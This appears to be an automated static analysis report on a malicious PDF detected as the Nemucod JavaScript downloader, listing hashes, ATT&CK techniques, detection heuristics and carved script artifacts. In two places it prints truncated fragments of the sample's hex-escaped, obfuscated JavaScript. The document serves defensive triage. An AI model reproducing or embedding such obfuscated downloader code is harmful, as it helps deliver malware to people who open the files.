Txt.Downloader.Nemucod-6769573-0 — PDF malware analysis

Static analysis result for SHA-256 f42507e09dab7f73…

MALICIOUS

PDF

Size: 30.6 KB
Authoring application: PyPDF2
First seen: 2026-05-08
MD5: 589f1ad8c47902dd009ffd8ad069588a
SHA-1: dae3426f8cb3552f57bf4d3341d39e6b3ee16fc3
SHA-256: f42507e09dab7f73cc12107250bfd6c40bbdb6a906cbffdbb8f4ce0456199ded
Risk Score: 286

Malware Insights

Txt.Downloader.Nemucod-6769573-0 · confidence 95%

MITRE ATT&CK
  • T1059.007 JavaScript
  • T1203 Exploitation for Client Execution
  • T1566.001 Spearphishing Attachment

The PDF file contains obfuscated JavaScript that is designed to exploit a vulnerability and download a secondary payload. The ClamAV detection and ML classifier strongly indicate malicious intent, specifically a downloader. The embedded JavaScript streams are the primary mechanism for this malicious activity.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 5

  • ClamAV: Txt.Downloader.Nemucod-6769573-0 · critical · CLAMAV_DETECTION
    ClamAV detected this file as malware: Txt.Downloader.Nemucod-6769573-0
  • JavaScript action · low · 2 related findings · PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster · critical · PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    /S /JavaScript
    /JS (b'var vGKu1 = new Function("\\x76\\x5f\\x73", \'\\x7b\\x72\\x65\\x74\\x75\\x72\\x6e\\x20\\x76\\x4e\\x45\\x6f\\x39\\x5b\\x22\\x73\\x70\\x22\\x2b\\x22\\x6c\\x69\\x74\\x22\\x5d\\x28\\x22\\x2c\\x22\\x29\\x5b\\x22\\x6a\\x6f\\x22\\x2b\\x22\\x69\\x6e\\x22\\x5d\\x28\\x22\\x22\\x29\\x3b\\x7d\');var vEn1 = new Function("\\x76\\x5f\\x73", \'\\x7b\\x76\\x61\\x72\\x20\\x76\\x5f\\x64\\x20\\x3d\\x20\\x6e\\x65\\x77\\x20\\x44\\x61\\x74\\x65\\x28\\x29\\x3b\\x76\\x5f\\x64\\x5b\\x22\\x73\\x65\\x74\\x55\\x54\\x …
    >>
  • Embedded JS stream · low · PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact · medium · EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0009_000.js | pdf-javascript-stream | PDF /JS object 9 at offset 0x52B | 17392 bytes
SHA-256: 12f0531ae028894aeda6f73832485d09d778ef46c806fd8f3a1c2e1e9d493536
Detection
ClamAV: Txt.Downloader.Nemucod-6769573-0
Obfuscation or payload: likely
Carved artifact contains 48 eval/decoder/string-building token(s). Carved artifact contains 2 long hex-escaped blob(s).
Preview script
First 1,000 lines of the extracted script
javascript_obj0009_001.js | pdf-javascript-stream | PDF /JS object 9 at offset 0x52B | 233 bytes
SHA-256: 02bb824b25c1d1832b822c31f159161f1609bd774acfb9daf70bab2bd156bb60
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long hex-escaped blob(s).
Preview script
First 1,000 lines of the extracted script
b'var vGKu1 = new Function("\x76\x5f\x73", '\x7b\x72\x65\x74\x75\x72\x6e\x20\x76\x4e\x45\x6f\x39\x5b\x22\x73\x70\x22\x2b\x22\x6c\x69\x74\x22\x5d\x28\x22\x2c\x22\x29\x5b\x22\x6a\x6f\x22\x2b\x22\x69\x6e\x22\x5d\x28\x22\x22\x29\x3b\x7d'